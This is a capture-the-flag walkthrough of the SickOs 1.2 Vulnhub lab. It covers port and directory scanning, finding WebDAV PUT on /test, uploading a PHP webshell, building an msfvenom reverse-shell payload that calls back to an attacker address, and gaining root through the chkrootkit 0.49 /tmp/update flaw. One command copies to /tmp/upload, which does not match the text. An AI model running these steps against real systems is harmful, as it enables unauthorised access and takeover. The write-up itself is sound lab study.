SickOs 1.2

SickOs 1.2 - Vulnhub

First, Nmap was run to scan for open ports and running service versions.

nmap -sV 192.168.130.131

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-14 11:29 MDT
Nmap scan report for 192.168.130.131
Host is up (0.00059s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:09:A5:6D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds

Next, dirb was run to scan for directories on the web service running on port 80. The “test” directory was discovered.

dirb http://192.168.130.131 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Oct 14 14:39:53 2016
URL_BASE: http://192.168.130.131/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.130.131/ ----
==> DIRECTORY: http://192.168.130.131/test/                                    
+ http://192.168.130.131/~sys~ (CODE:403|SIZE:345)                             
                            
---- Entering directory: http://192.168.130.131/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
(Use mode '-w' if you want to scan it anyway)
                                
-----------------
END_TIME: Fri Oct 14 14:40:13 2016
DOWNLOADED: 20458 - FOUND: 1

Curl was used to check the allowed HTTP methods by sending the OPTIONS request type. On the test directory, we found we have permission to use the PUT method to upload files to the server.

curl -v 192.168.130.131/test -X OPTIONS
*   Trying 192.168.130.131...
* Connected to 192.168.130.131 (192.168.130.131) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.130.131
> User-Agent: curl/7.50.1
> Accept: */*
> 
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.130.131/test/
< Content-Length: 0
< Date: Fri, 14 Oct 2016 20:38:46 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.130.131 left intact

Using curl I was able to upload a php backdoor to the server.

cp /usr/share/webshells/php/php-backdoor.php bd.php
curl -T bd.php -0 http://192.168.130.131/test/bd.php

Next, to get a reverse shell I generated an elf payload and executed it using the php backdoor.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.130.129 lport=443 -f elf -o payload
curl -T payload -0 http://192.168.130.131/test/payload2

Looking at installed software we can see chkrootkit 0.49 is installed. By searching exploit-db, we can see the running version is vulnerable to privilege escalation.

dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version        Description
+++-==============-==============-============================================
... 
rc  chkrootkit     0.49-4ubuntu1. rootkit detector
...

searchsploit chkrootkit 0.49
---------------------------------------------------------------------- ----------------------------------
Exploit Title                                                         | Path
---------------------------------------------------------------------- ----------------------------------
Chkrootkit 0.49 - Privilege Escalation"                               | /linux/local/33899.txt
---------------------------------------------------------------------- ----------------------------------

The exploitdb entry below explains that this vulnerability is exploited by putting a binary file in ‘/tmp’ named ‘update’.

cat /usr/share/exploitdb/platforms/linux/local/33899.txt 

...
Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
...

The ELF payload generated earlier was then copied to /tmp/update.

cp /var/www/test/payload2 /tmp/upload

Finally, the reverse shell connects back to us, and we are able to read the proof file.

image